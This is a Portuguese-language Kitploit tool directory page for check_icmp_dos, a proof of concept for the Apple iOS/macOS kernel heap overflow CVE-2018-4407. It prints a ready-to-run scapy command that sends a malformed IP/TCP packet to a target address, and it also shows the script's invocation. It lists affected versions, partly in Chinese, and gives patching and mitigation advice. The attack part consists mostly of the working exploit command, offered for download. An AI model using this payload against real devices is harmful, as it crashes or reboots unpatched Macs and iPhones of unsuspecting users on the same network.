Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
check_icmp_dos — iOS 12 / OS X Overflow de Heap no Kernel Remoto (CVE-2018-4407) POC | Kitploit
Ferramentas/GitHubGitHub/pa55w0rd/check_icmp_dos
Segurança iOSAnálise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoSegurança Móvel
GitHubpa55w0rd/check_icmp_dos

check_icmp_dos

iOS 12 / OS X Overflow de Heap no Kernel Remoto (CVE-2018-4407) POC

Ver Repositório
6010há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

check_icmp_dos

*iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC:

root@kitploit:~
pip install scapy
sudo scapy 
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))

Ou use o script

root@kitploit:~
python check_icmp_dos.py 127.0.0.1

Esta vulnerabilidade permite que um atacante, uma vez conectado à mesma rede Wi-Fi, envie pacotes maliciosos para outros usuários desavisados, causando a falha ou reinicialização de qualquer dispositivo Mac ou iOS. Como a vulnerabilidade existe no código central da rede do sistema, nenhum software antivírus pode se defender.

Dispositivos rodando os seguintes sistemas operacionais são vulneráveis:

root@kitploit:~
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)

Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)

Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)

Apple OS X El Capitan及更早版本:所有设备

Sugestão de correção

Atualmente, a Apple já lançou a atualização iOS 12.1 para corrigir essa vulnerabilidade. Recomenda-se que os usuários verifiquem a versão do sistema o mais rápido possível. Se afetados, tome medidas de correção imediatamente. As medidas de correção são as seguintes:

  1. Atualize o sistema para a versão mais recente.
  2. Se não for possível atualizar para a versão mais recente, ativar o modo oculto no firewall do macOS pode impedir o ataque. Essa configuração do sistema não está ativada por padrão, sendo necessário ativá-la manualmente.
  3. Não se conectar a redes Wi-Fi públicas. A única condição necessária para acionar a vulnerabilidade é estar na mesma rede. A vulnerabilidade não pode ser acionada enviando pacotes maliciosos pela internet.
Baixar ferramenta